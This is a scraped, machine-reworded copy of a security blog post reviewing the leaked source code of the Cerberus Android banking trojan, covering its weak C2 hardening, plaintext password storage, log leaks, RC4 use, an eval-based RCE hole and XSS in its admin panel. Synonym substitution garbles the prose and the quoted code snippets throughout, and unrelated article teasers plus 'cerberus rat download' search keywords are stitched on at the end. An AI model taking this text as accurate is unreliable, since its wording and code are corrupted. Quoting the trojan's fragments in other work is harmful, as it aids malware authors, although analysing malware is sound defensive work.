A Banking Trojan Security Code Review — Cerberus


    Safety Code Overview of a Banking Trojan — Cerberus

    Over a yr in the past, I began listening to about this new Banking Trojan known as Cerberus. The creator of this malware reportedly used to ridicule safety researchers on social media as per article. The malware was bought as a whole package deal:

    • MySQL seed knowledge with payloads and logos to masquerade a number of well-liked banking apps
    • React.js based mostly admin panel with a PHP-based Relaxation API for a contemporary C2 expertise

    Cerberus Admin Panel (Supply:

    Malware, as one would count on, are normally fairly obfuscated making it troublesome to investigate and perceive the unique supply code. As a subsequent gen static evaluation firm, our instruments depend on the supply of supply code and a buildable atmosphere.

    Just lately, the supply code for Cerberus obtained leaked on GitHub offering me a chance to overview them and carry out static evaluation utilizing the instruments we construct at ShiftLeft.

    This weblog summarizes a few of my findings from this evaluation.

    Rudimentary C2 server hardening

    The set up script use torsocks to obtain the server elements. Nonetheless, the precise C2 server PHP code merely runs behind nginx and serves over http. The shopper android app additionally communicates again with the server over http. The server panel is also accessed with none authentication over public IP in default setting.

    Lack of secrets and techniques administration is requesting a root password by way of the command line throughout set up.

    echo “Enter root password:”learn password

    This password is then:

    • Saved in /var/www/config.php as outline(‘passwd’ , ‘$password’); in plain-text
    • Create a non-root consumer with all privileges sharing the identical password

    mysql -uroot — password=”$password” -e “CREATE USER ‘non-root’@’localhost’ IDENTIFIED BY ‘$password’;”mysql -uroot — password=”$password” -e “GRANT ALL PRIVILEGES ON *.* TO ‘non-root’@’localhost’;”

    Delicate knowledge leaks

    Any software program shouldn’t leak delicate knowledge brazenly in log recordsdata. A malware in actual fact shouldn’t reveal its existence and may masks any indicators of presence.

    Cerberus unusually is stuffed with logging code. A great deal of delicate info that will get collected or retrieved from server are brazenly logged.

    Some examples:

    public String string_80 = “EnCryptResponce: “;public String string_81 = “CheckBotRESPONCE: “;public String string_82 = “||youNeedMoreResources||”;

    Given the above obfuscated strings, it was doable to establish numerous delicate knowledge leaks utilizing ShiftLeft Subsequent Gen.

    utl.Log(TAG_LOG, consts.string_80 + response);response = utl.trafDeCr(response);utl.Log(TAG_LOG, consts.string_81 + response);

    And one other.

    response = utl.trafDeCr(context, response);utl.Log(TAG_LOG, “RESPONCE: “ + response);

    Over 20 cases of such leaks have been found by our software.

    Lack of a proper API contract

    Despite the fact that there’s a REST api server many of the communication with the android app in actual fact use primitive strings for triggering numerous functionalities over http.

    Plain-text strings resembling ||youNeedMoreResources|| are used as a sign to obtain extra payloads.

    if (response.accommodates(“||youNeedMoreResources||”)&& (!utl.SettingsRead(context, consts.statDownloadModule).equals(consts.str_1))) { //downloading moduleutl.downloadModuleDex(this, idbot);utl.Log(“obtain”,”run”);

    By searching for methodology calls containing response.accommodates I might acquire all such strings for numerous operations resembling seize keystrokes, take screenshot, disable play shield and so on.

    Cerberus Trojan display overlay (Supply:

    Weak Encryption Algorithm

    Weak algorithms resembling RC4 Encryption is utilized in various locations.

    return base64_encode(bin2hex(RC4Crypt::encrypt_($key, $string)));

    RCE vulnerabilities within the panel app

    The admin panel makes use of weak eval capabilities.

    export perform try_eval(command) { //console.log(“Known as: “ + command); eval(‘strive {‘ + command + ‘} catch (err) { console.log(“Error: “ + err ) } ‘);}

    There have been extra cases of RCE since no payload or picture knowledge that would get uploaded are ever validated or sanitized.

    The developer in actual fact is conscious of this.

    console.log(‘%c Don’t use this console! ‘, ‘font-size:18px; background: #002b36; shade: #a7a89b’);

    Weak dependencies (a9)

    Many outdated dependencies are used:

    Dependency Scan Abstract (nodejs)╔═════════════╤═══════╤════════╗║ Severity │ Rely │ Standing ║╟─────────────┼───────┼────────╢║ UNSPECIFIED │ 0 │ ✅ ║║ LOW │ 3 │ ✅ ║║ MEDIUM │ 2 │ ✅ ║║ HIGH │ 3 │ ❌ ║║ CRITICAL │ 0 │ ✅ ║╚═════════════╧═══════╧════════╝

    XSS Vulnerabilities in C2 panel

    The panel was a goldmine for XSS vulnerabilities.

    different: end_subscribe: ”>Virtually all textual content fields have been weak as if the developer wished issues to weak. Even some static blocks have been weak to Mirrored XSS.

    echo “

    ”.$knowledge[“ID”] . “” .“” .$knowledge[“contact”] . “” .“” .$knowledge[“domain”] . “” .

    Closing ideas

    Performing safety code overview of a malware is certainly out of the strange for me. Nonetheless, this train highlighted a recognized actuality – even malware authors will not be excellent builders who take into consideration safety whereas coding. The type of safety flaws seen on this malware point out that the product was both rushed via or the developer behind Cerberus merely didn’t trouble about safety or lacks expertise.

    Safety Code Overview of a Banking Trojan — Cerberus was initially printed in ShiftLeft Weblog on Medium, the place individuals are persevering with the dialog by highlighting and responding to this story.

    *** It is a Safety Bloggers Community syndicated weblog from ShiftLeft Weblog – Medium authored by Prabhu Subramanian. Learn the unique put up at:—-86a4f941c7da—4

    cerberus banking download,cerberus banking github,cerberus rat download

    Recent Articles

    Inflammatory skin diseases

    INFLAMMATORY SKIN DISEASES AND THEIR TREATMENT The most common and important inflammatory skin diseases include neurodermatitis, psoriasis, acne and rosacea. We are also aware of many...

    Unravel the XDR Noise and Recognize a Proactive Approach

      Cybersecurity professionals know this drill nicely all too nicely. Making sense of heaps of info and noise to entry what actually issues. XDR (Prolonged Detection & Response) has been a technical acronym thrown round within the cybersecurity business with many notations and...

    PLATYPUS: Hackers Can Obtain Crypto Keys by Monitoring CPU Power Consumption

      Researchers have disclosed the small print of a brand new side-channel assault technique that can be utilized to acquire delicate data from a system...

    The Container configurations in Amazon ECS

      Revealed: November 7, 2020 | Modified: November 7, 2020 | Zero views A fast put up on superior container configurations in Amazon ECS. ECS container superior...

    Antivirus Testing – VIPRE for your Home and Business

      Individuals typically marvel, “What’s one of the best antivirus?” A number of distributors will declare that their product is one of the best within...

    Related Stories